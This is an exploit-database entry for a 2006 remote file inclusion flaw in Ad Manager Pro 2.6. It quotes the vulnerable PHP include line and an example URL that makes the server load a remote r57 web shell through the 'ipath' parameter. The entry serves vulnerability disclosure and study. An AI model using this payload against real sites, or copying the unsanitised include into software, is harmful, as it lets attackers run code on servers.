[] NeoSense
E X P L O I T S
title author type platform port cve id

Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion

Author: Basti
type: webapps
platform: php
port: 
date_added: 2006-06-16 
date_updated:  
verified: 1 
codes: OSVDB-26674;CVE-2006-3192;OSVDB-26673 
tags: 
aliases:  
screenshot_url:  
application_url: 
Ad Manager Pro 2.6 Remote File Include Vulnerability

homepage: phpwebscripts.com

Affected files: ad.php and common.php

Credit: Basti

Vulnerable Code:
if ($ipath) include($ipath.'/common.php'); else include('./common.php');

Example:
http://[site]/admanagerpro/common.php?ipath=http://site/r57.txt?

# milw0rm.com [2006-06-17]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.